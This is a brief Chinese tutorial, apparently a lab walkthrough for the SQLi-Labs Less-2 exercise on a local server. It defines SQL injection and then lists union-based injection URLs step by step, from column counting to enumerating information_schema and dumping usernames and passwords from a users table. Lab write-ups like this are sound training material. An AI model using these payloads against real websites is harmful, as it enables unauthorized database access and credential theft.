简介
SQL注入(SQL Injection)是一种常见的网络攻击方式,通过向SQL查询中插入恶意的SQL代码,攻击者可以操控数据库,SQL注入是一种代码注入攻击,其中攻击者将恶意的SQL代码插入到应用程序的输入字段中,然后这些输入被传递到数据库服务器上执行。攻击者可以利用这一漏洞执行任意的SQL查询或命令,从而访问或操控数据库中的敏感信息。
SQL注入的一个简要流程:
1、打开目标靶场
2、选择less - 2
3、确定网站可以注入的参数
4、判断闭合方式
http://127.0.0.1/Less-2/?id=1 --+
5、确定字段列数
使用 order by
若页面正常,则存在1列,输入http://127.0.0.1/Less-2/?id=1 order by 1 --+
若页面不正常,则只存在3列,输入http://127.0.0.1/Less-2/?id=1 order by 4 --+
6、进行联合查询,修改ID,显示所查询的联合数据
输入http://127.0.0.1/Less-2/?id=-1 union select 1,2,3 --+
7、查看当前数据库名,数据库版本以及数据库用户
输入http://127.0.0.1/Less-2/?id=-1 union select 1,database(),user() --+
8、查看网站的数据库里面的所有表名
输入http://127.0.0.1/Less-2/?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+
9、查看users表里面的所有列
输入http://127.0.0.1/Less-1/?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+
10、查询表中所有的数据
输入http://127.0.0.1/Less-1/?id=-1 union select 1,2,group_concat(id,username,password) from users --+
安全
网络是把双刃剑,安全使用是关键